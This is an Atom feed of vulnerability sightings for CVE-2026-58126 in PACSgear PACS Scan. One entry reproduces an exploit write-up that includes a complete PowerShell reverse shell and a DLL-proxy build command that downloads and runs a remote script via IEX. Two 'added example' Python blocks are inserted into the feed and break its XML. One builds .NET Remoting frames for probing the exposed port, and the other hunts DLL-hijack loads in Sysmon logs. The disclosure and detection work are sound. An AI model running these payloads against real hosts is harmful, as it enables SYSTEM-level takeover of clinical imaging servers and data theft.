<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://vulnerability.circl.lu/sightings/feed</id>
  <title>Most recent sightings.</title>
  <updated>2026-07-02T19:56:46.859130+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>info@circl.lu</email>
  </author>
  <link href="https://vulnerability.circl.lu" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the 10 most recent sightings.</subtitle>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/33758839-1cff-407d-b0e4-728613a6d8b9/export</id>
    <title>33758839-1cff-407d-b0e4-728613a6d8b9</title>
    <updated>2026-07-02T19:56:46.879473+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://cve.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "33758839-1cff-407d-b0e4-728613a6d8b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-58126", "type": "seen", "source": "https://bsky.app/profile/kriptabiz.bsky.social/post/3mpmzgon6cf2q", "content": "Vulnerability CVE-2026-58126 in PACSgear PACS Scan 5.2.1: risk of unauthenticated remote code execution\n\n\n\nhttps://kripta.biz/posts/81A2E910-3A3A-458F-8171-9511D676DCFD", "creation_timestamp": "2026-07-02T02:48:55.069544Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/33758839-1cff-407d-b0e4-728613a6d8b9/export"/>
    <published>2026-07-02T02:48:55.069544+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/d3c60c88-af4e-4421-9554-8c862b8f3b49/export</id>
    <title>d3c60c88-af4e-4421-9554-8c862b8f3b49</title>
    <updated>2026-07-02T19:56:46.881966+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://cve.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "d3c60c88-af4e-4421-9554-8c862b8f3b49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-58126", "type": "seen", "source": "https://gist.github.com/VAMorales/6dc232729cdd517fa30d581fbcd98d8f", "content": "# 1. Exploit Title: PACSGEAR PACS Scan - Unauthenticated Arbitrary File Read/Write + RCE via .NET Remoting\n## Disclosure Date: 07/01/2026\n## CVE ID: [CVE-2026-58126](https://www.cve.org/cverecord?id=CVE-2026-58126)\n## Exploit Authors: Victor A. Morales and Jan A. Rodriguez of GM Sectec, Corp.\n## Vendor Homepage: https://www.hyland.com/en/solutions/products/pacsgear\n## Known Affected Versions: 5.2.1\n\n### Description\nPACSGEAR PACS Scan exposes a .NET Remoting service on TCP port 22222, bound to all interfaces, registered by the executable PGImageExchQueue.exe. The RegisterWellKnownServiceType function registers the .NET Remoting TCP channel for the configured service; the registered ObjectURI is PGImageExchange. By modifying the proof of concept of an object unmarshalling technique discovered by researchers at Code White, using the .NET WebClient class to read and write files on the host, and adding a custom channel sink that forces the connection to the correct host and port, arbitrary file read can be achieved to leak the contents of internal system files. Exploitation only requires knowledge of a valid ObjectURI, which is the same default across all instances, and does not require authentication.\n\nTo achieve RCE, it was observed that the executable PGImageExchangeQueueSvc.exe, running as NT Authority\\SYSTEM, attempts at start-up to load several dynamic-link libraries (e.g. CRYPTSP.DLL) from file system paths where they are missing, which creates DLL hijacking opportunities when combined with the .NET Remoting arbitrary file write primitive.\n\n### Proof-of-Concept\n\n`.\\RemotingClient_MBRO_Lazy.exe tcp://:22222/PGImageExchange C:\\Windows\\win.ini`\n\nSnippet of the custom channel fix code:\n\n```csharp\ninternal class ChannelUriFixingClientChannelSinkProvider : IClientChannelSinkProvider\n    {\n        private readonly string publicHost;\n        private readonly int publicPort;\n\n        public IClientChannelSinkProvider Next { get; set; }\n\n        public ChannelUriFixingClientChannelSinkProvider(Uri objUrl)\n        {\n            if (objUrl == null) throw new ArgumentNullException(nameof(objUrl));\n\n            this.publicHost = objUrl.Host;\n            this.publicPort = objUrl.Port;\n        }\n    }\n```\n\nThe following code is the PowerShell TCP reverse connection script used for code execution.\n\n```powershell\n$IPAddress = '192.168.179.136'\n$Port      = '8443'\n \n# Reverse Shell - v4.0 Compatible\n$RSC = New-Object System.Net.Sockets.TCPClient($IPAddress, $Port)\n$Strm = $RSC.GetStream()\n[byte[]]$DB = 0..65535 | % {0}\n \n# StringWriter for output buffering\n$OB = New-Object System.IO.StringWriter\n \nwhile (($i = $Strm.Read($DB, 0, $DB.Length)) -ne 0) {\n    Try {\n        # Using the static Encoding property (v4.0 safe)\n        $Comm = [System.Text.Encoding]::ASCII.GetString($DB, 0, $i)\n        $CommOut = (iex $Comm *&gt;&amp;1 | Out-String)\n    } Catch {\n        $CommOut = \"$($Error[0])`n\"\n    }\n \n    $OB.Write($CommOut)\n    $ProStr = $OB.ToString() + 'PS ' + (PWD).Path + '&gt; '\n    $ProBts = [System.Text.Encoding]::ASCII.GetBytes($ProStr)\n\n    $Strm.Write($ProBts, 0, $ProBts.Length)\n    $Strm.Flush()\n\n    # Clear the buffer for the next command\n    $OB.GetStringBuilder().Clear() | Out-Null\n}\n \n$Strm.Close()\n$RSC.Close()\n```\n\nThe open-source tool DLHell from Synacktiv, which supports local and remote DCOM-based Windows DLL proxying, was slightly modified to compile for 32-bit architectures. The PowerShell reverse TCP connection script was packaged as a malicious DLL payload named test.dll, which is triggered by CRYPTSP.DLL upon a service or system restart. Although the dynamic-link libraries could not be fully compiled from Linux, DLHell still generates the files and definitions needed to repair the export tables on Windows.\n\n```bash\npython3 DLHell32.py -t template-32.tpe -c \"powershell.exe -ExecutionPolicy Bypass -c \\\\\\\"IEX (New-Object Net.WebClient).DownloadString('http://192.168.179.130/rs.ps1')\\\\\\\"\" -local-lib 'lib/cryptsp.dll' -local-target test.dll\n```\n\nThe following Windows command compiles the generated source into an object file for later linking in a Windows build.\n\n`cl /nologo /c /O1 /GS- /DWIN32 cryptsp.cpp`\n\nThe following Windows command links the compiled object file (cryptsp.obj) into a DLL.\n\n`link /nologo /DLL /DEF:cryptsp.def cryptsp.obj /OUT:cryptsp.dll`\n\nThe arbitrary file write primitive is used to upload the generated malicious dynamic-link libraries using the modified version of the RemotingClient_MBRO technique.\n\n`.\\RemotingClient_MBRO.exe --put tcp://:22222/PGImageExchange .\\cryptsp.dll \"C:\\Program Files (x86)\\Pacsgear\\Pacsgear Image Exchange Service\\cryptsp.dll\"`\n\n`.\\RemotingClient_MBRO.exe --put tcp://:22222/PGImageExchange .\\test.dll \"C:\\Program Files (x86)\\Pacsgear\\Pacsgear Image Exchange Service\\test.dll\"`\n\nExploitation requires a restart of the affected service. Depending on the privilege level of the account, this may be accomplished by directly restarting the service, rebooting the system, or relying on an automatic restart triggered by a service failure. These tasks cannot be performed by a low-privileged user.\n\nAfter the PGImageExchangeQueueSvc.exe service restarts and attempts to load the dynamic-link library CRYPTSP.DLL, test.dll is triggered, causing the host to connect to an attacker-controlled web server on port 80 and execute the PowerShell reverse connection script.\n\nThe reverse connection is established and runs as the privileged NT Authority\\SYSTEM account.", "creation_timestamp": "2026-07-01T11:51:57.085870Z"}</content>
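Added example, not part of the sighting above and not the RemotingClient_MBRO tool of the GM Sectec researchers: a minimal builder and parser for the .NET Remoting TCP channel framing (MS-NRTP) that the exposed port 22222 service speaks, plus a preamble fingerprint a scanner can use to confirm that an open port is a .NET Remoting endpoint rather than something else. The field layout (".NET" preamble, one-byte major/minor version, 16-bit operation and content-distribution fields, 32-bit length, then tokenised headers) follows my reading of the MS-NRTP specification and should be verified against it; the ObjectURI PGImageExchange comes from the advisory, the sample body bytes are constructed placeholders and not a real serialised MethodCall.

```python
"""Minimal MS-NRTP (.NET Remoting TCP channel) frame builder and parser.

Added example; field layout is from my reading of MS-NRTP 2.2.3.3 and
should be checked against the specification before relying on it.
"""
PREAMBLE = b".NET"
OP_REQUEST, OP_ONEWAY, OP_REPLY = 0, 1, 2
# Header tokens: EndOfHeaders, Custom, StatusCode, StatusPhrase, RequestUri,
# CloseConnection, ContentType.
HDR_END, HDR_CUSTOM, HDR_STATUS, HDR_PHRASE, HDR_URI, HDR_CLOSE, HDR_CTYPE = range(7)
# Header value formats: Void, CountedString, Byte, UInt16, Int32.
FMT_VOID, FMT_STRING, FMT_BYTE, FMT_U16, FMT_I32 = range(5)
STR_UNICODE, STR_UTF8 = 0, 1


def _u16(n):
    return n.to_bytes(2, "little")


def _i32(n):
    return n.to_bytes(4, "little", signed=True)


def _counted_string(s):
    """Encoding byte, int32 byte length, bytes; empty strings are sent as Unicode/0."""
    data = s.encode("utf-8")
    if not data:
        return bytes([STR_UNICODE]) + _i32(0)
    return bytes([STR_UTF8]) + _i32(len(data)) + data


def build_frame(request_uri, body, op=OP_REQUEST,
                content_type="application/octet-stream"):
    """Length-delimited frame addressed to an ObjectURI such as 'PGImageExchange'."""
    headers = (_u16(HDR_URI) + bytes([FMT_STRING]) + _counted_string(request_uri)
               + _u16(HDR_CTYPE) + bytes([FMT_STRING]) + _counted_string(content_type)
               + _u16(HDR_END))
    # preamble, version 1.0, operation, distribution 0 (not chunked), length
    return (PREAMBLE + bytes([1, 0]) + _u16(op) + _u16(0) + _i32(len(body))
            + headers + body)


class _Reader:
    def __init__(self, buf):
        self.buf, self.pos = buf, 0

    def take(self, n):
        if self.pos + n > len(self.buf):
            raise ValueError("truncated frame")
        chunk = self.buf[self.pos:self.pos + n]
        self.pos += n
        return chunk

    def u16(self):
        return int.from_bytes(self.take(2), "little")

    def i32(self):
        return int.from_bytes(self.take(4), "little", signed=True)

    def counted_string(self):
        enc = self.take(1)[0]
        raw = self.take(self.i32())
        return raw.decode("utf-8" if enc == STR_UTF8 else "utf-16-le")

    def value(self, fmt):
        if fmt == FMT_VOID:
            return None
        if fmt == FMT_STRING:
            return self.counted_string()
        if fmt == FMT_BYTE:
            return self.take(1)[0]
        if fmt == FMT_U16:
            return self.u16()
        if fmt == FMT_I32:
            return self.i32()
        raise ValueError("unknown header format %d" % fmt)


def is_nrtp(data):
    """Cheap banner fingerprint: preamble plus protocol version 1.0."""
    return len(data) >= 6 and data[:4] == PREAMBLE and data[4:6] == b"\x01\x00"


def parse_frame(data):
    """Return operation, RequestUri, all headers and body of one frame."""
    if not is_nrtp(data):
        raise ValueError("not a .NET Remoting TCP frame")
    r = _Reader(data)
    r.take(6)
    op = r.u16()
    if r.u16() != 0:
        raise ValueError("chunked content not supported here")
    length = r.i32()
    headers = {}
    while True:
        token = r.u16()
        if token == HDR_END:
            break
        if token == HDR_CUSTOM:  # assumed layout: name, format byte, value
            headers[r.counted_string()] = r.value(r.take(1)[0])
        else:
            headers[token] = r.value(r.take(1)[0])
    return {"op": op, "uri": headers.get(HDR_URI), "headers": headers,
            "body": r.take(length)}
```

To probe a live host, send the output of build_frame over a TCP socket to port 22222 and pass the reply to parse_frame; a request the server will actually dispatch needs a BinaryFormatter-serialised MethodCall as the body, which this example deliberately leaves out. The fingerprint alone is enough for an inventory scan of exposed .NET Remoting listeners.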
    <link href="https://vulnerability.circl.lu/sighting/d3c60c88-af4e-4421-9554-8c862b8f3b49/export"/>
    <published>2026-07-01T11:51:57.085870+00:00</published>
  </entry>
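Added example, not from either sighting and not the researchers' tooling: detection logic for the DLL search-order hijack the second sighting relies on, where a proxy cryptsp.dll and a payload test.dll are written next to PGImageExchangeQueueSvc.exe and picked up at service restart. It runs over constructed Sysmon-style Event ID 7 (ImageLoad) lines and flags any load of a well-known OS DLL name from outside the Windows system directories, and any unsigned module loaded from outside them. The key=value line format, the SYSTEM_DIRS tuple and the KNOWN_OS_DLLS list are assumptions; the service and install path come from the advisory text.

```python
"""Hunt for DLL search-order hijacks in ImageLoad telemetry.

Added example over constructed Sysmon-style Event ID 7 lines; the line
format, directory list and DLL name list are assumptions, not from the page.
"""
import ntpath
import re

# Directories from which Windows is expected to resolve its own DLLs (assumed).
SYSTEM_DIRS = (
    r"c:\windows\system32",
    r"c:\windows\syswow64",
    r"c:\windows\winsxs",
)

# OS DLL names that are commonly hijacked when an application directory is
# searched before the system directory (assumed, extend for your estate).
KNOWN_OS_DLLS = {"cryptsp.dll", "cryptbase.dll", "version.dll", "wlanapi.dll",
                 "dbghelp.dll", "wtsapi32.dll", "profapi.dll", "rsaenh.dll"}

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Turn a key=value line into a dict; quoted values keep their spaces."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def load_reason(ev):
    """Reason string when an ImageLoad looks like a hijack, else None."""
    image = ev.get("ImageLoaded", "").lower()
    if not image:
        return None
    directory = ntpath.dirname(image)
    if directory.startswith(SYSTEM_DIRS):
        return None
    if ntpath.basename(image) in KNOWN_OS_DLLS:
        return "os dll name outside system directories"
    if ev.get("Signed", "").lower() == "false":
        return "unsigned module outside system directories"
    return None


def hunt(lines):
    """Return (loading process, loaded module, reason) for every suspicious load."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "7":
            continue
        reason = load_reason(ev)
        if reason:
            hits.append((ev.get("Image"), ev.get("ImageLoaded"), reason))
    return hits


SVC = "C:\\Program Files (x86)\\Pacsgear\\Pacsgear Image Exchange Service\\"

# Constructed sample events, not real telemetry.
SAMPLE = [
    'EventID=7 Image="' + SVC + 'PGImageExchangeQueueSvc.exe" '
    'ImageLoaded="C:\\Windows\\SysWOW64\\rsaenh.dll" Signed=true',
    'EventID=7 Image="' + SVC + 'PGImageExchangeQueueSvc.exe" '
    'ImageLoaded="' + SVC + 'cryptsp.dll" Signed=false',
    'EventID=7 Image="' + SVC + 'PGImageExchangeQueueSvc.exe" '
    'ImageLoaded="' + SVC + 'test.dll" Signed=false',
    'EventID=11 Image="C:\\Windows\\explorer.exe" '
    'TargetFilename="C:\\Users\\a\\cryptsp.dll"',
]

if __name__ == "__main__":
    for image, module, reason in hunt(SAMPLE):
        print(reason, ":", image, "loaded", module)
```

The first rule catches the proxy DLL regardless of whether it is signed, because a legitimate cryptsp.dll never lives in an application directory; the second catches the unsigned payload DLL that the proxy chains to. Pair both with a file-creation rule on the service directory, since the arbitrary file write in the advisory lands the DLLs long before the restart that loads them.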
</feed>
